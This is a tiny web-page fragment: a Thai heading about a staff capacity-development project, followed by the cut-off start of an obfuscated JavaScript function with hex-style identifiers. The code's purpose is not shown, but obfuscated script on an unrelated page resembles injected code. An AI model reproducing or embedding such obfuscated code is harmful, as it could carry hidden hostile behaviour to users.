โครงการพัฒนาศักยภาพบุคลากรในการปฏิบัติงาน

function _0x9e23(_0x14f71d,_0x4c0b72){const…